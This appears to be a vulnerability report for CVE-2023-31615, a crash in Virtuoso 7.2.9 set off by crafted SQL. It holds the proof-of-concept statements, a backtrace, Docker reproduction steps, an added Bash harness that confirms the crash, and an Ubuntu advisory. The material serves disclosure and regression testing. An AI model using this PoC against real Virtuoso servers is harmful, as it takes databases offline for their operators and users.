CVE-2023-31615: virtuoso 7.2.9 crashed at chash_array · Issue #1124 · openlink/virtuoso-opensource
An issue in the chash_array component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE t1(x INTEGER UNIQUE);
CREATE TABLE k(v varchar(255), excluded varchar(255));
INSERT INTO t1(x, x, x, x, x, x, x) VALUES(16183,15638,6,0,5,2,0);
SELECT 'one', t1.* FROM t1 LEFT JOIN k ON t1.x=k.v WHERE k.v IS NULL;
backtrace:
#0 0x4257c4 (chash_array+0x834)
#1 0x43932f (hash_source_chash_input+0x6df)
#2 0x7ac43e (qn_input+0x3ce)
#3 0x7ac8a6 (qn_send_output+0x236)
#4 0x81e26d (set_ctr_vec_input+0x94d)
#5 0x7ac43e (qn_input+0x3ce)
#6 0x7acb6f (qn_ts_send_output+0x23f)
#7 0x7b247e (table_source_input+0x16ee)
#8 0x7ac43e (qn_input+0x3ce)
#9 0x7ac8a6 (qn_send_output+0x236)
#10 0x44c34e (chash_fill_input+0x13e)
#11 0x535d6f (hash_fill_node_input+0xef)
#12 0x7ac43e (qn_input+0x3ce)
#13 0x7ac8a6 (qn_send_output+0x236)
#14 0x81e26d (set_ctr_vec_input+0x94d)
#15 0x7ac43e (qn_input+0x3ce)
#16 0x7bdc6e (qr_exec+0x11ee)
#17 0x7cb446 (sf_sql_execute+0x11a6)
#18 0x7cbf4e (sf_sql_execute_w+0x17e)
#19 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#20 0xe1f01c (future_wrapper+0x3fc)
#21 0xe2691e (_thread_boot+0x11e)
#22 0x7fac44860609 (start_thread+0xd9)
#23 0x7fac44630133 (clone+0x43)
Ways to reproduce (write the PoC to the file '/tmp/test.sql' first):
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait for the server to start
sleep 10
# check whether a simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
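The steps above send the PoC but leave it to the reader to tell whether the server actually died. The following harness is an added example, not the reporter's or the project's code: it wraps the same Docker steps, replaces the fixed sleep with a readiness poll, probes liveness before and after the PoC (container still running and a trivial query still answered), and prints the tail of the container log when a crash is confirmed. It assumes Docker is available and uses the reporter's image tag, container name and DBA password; the PoC file path defaults to /tmp/test.sql on the host. The verdict function is kept free of Docker calls so it can be checked on its own.

```shell
#!/usr/bin/env bash
# Added reproduction harness for the crash reported in issue #1124
# (example code, not from the original report). Assumes Docker and the
# openlink/virtuoso-opensource-7:7.2.9 image; names/password are the
# reporter's values. Run with:  bash repro.sh run
set -u

IMAGE="openlink/virtuoso-opensource-7:7.2.9"
CONTAINER="virtdb_test"
POC_FILE="${POC_FILE:-/tmp/test.sql}"

# Write the statements from the report, one per line, to the file given as $1.
write_poc() {
  cat >"$1" <<'EOF'
CREATE TABLE t1(x INTEGER UNIQUE);
CREATE TABLE k(v varchar(255), excluded varchar(255));
INSERT INTO t1(x, x, x, x, x, x, x) VALUES(16183,15638,6,0,5,2,0);
SELECT 'one', t1.* FROM t1 LEFT JOIN k ON t1.x=k.v WHERE k.v IS NULL;
EOF
}

# Send one SQL string to the server through isql inside the container.
run_sql() {
  printf '%s\n' "$1" | docker exec -i "$CONTAINER" isql 1111 dba
}

# Liveness probe: the container must still be running AND answer a trivial
# query. A server crash fails at least one of the two.
server_alive() {
  docker inspect -f '{{.State.Running}}' "$CONTAINER" 2>/dev/null | grep -qx true \
    && run_sql "SELECT 1;" >/dev/null 2>&1
}

# Poll for readiness for up to $1 seconds instead of a fixed sleep.
wait_for_server() {
  local deadline=$(( $(date +%s) + $1 ))
  until server_alive; do
    [ "$(date +%s)" -lt "$deadline" ] || return 1
    sleep 1
  done
}

# Pure decision on the two probe results ($1 = status before PoC, $2 = status
# after PoC; 0 means alive). Prints the verdict and returns 0 only when the
# server was alive before and dead after, i.e. the DoS is confirmed.
verdict() {
  if [ "$1" = 0 ] && [ "$2" != 0 ]; then echo "CRASH"; return 0; fi
  if [ "$1" = 0 ]; then echo "SURVIVED"; return 1; fi
  echo "NOT_READY"; return 2
}

main() {
  docker container rm "$CONTAINER" -f >/dev/null 2>&1 || true
  docker run --name "$CONTAINER" -itd --env DBA_PASSWORD=dba "$IMAGE" >/dev/null
  wait_for_server 60 || { echo "server never came up" >&2; exit 2; }
  write_poc "$POC_FILE"
  server_alive; before=$?
  docker exec -i "$CONTAINER" isql 1111 dba <"$POC_FILE" || true   # isql itself may fail when the server dies
  sleep 2                                                          # give the process time to go down
  server_alive; after=$?
  result=$(verdict "$before" "$after"); rc=$?
  echo "result: $result"
  [ "$rc" -eq 0 ] && docker logs --tail 40 "$CONTAINER"            # crash output from the server
  exit "$rc"
}

if [ "${1:-}" = "run" ]; then main; fi
```

Exit code 0 means the crash reproduced, 1 means the server survived the PoC (for instance on a patched build), 2 means the server never became ready, so the script can sit directly in a regression check for a fixed release.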
Related news
Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.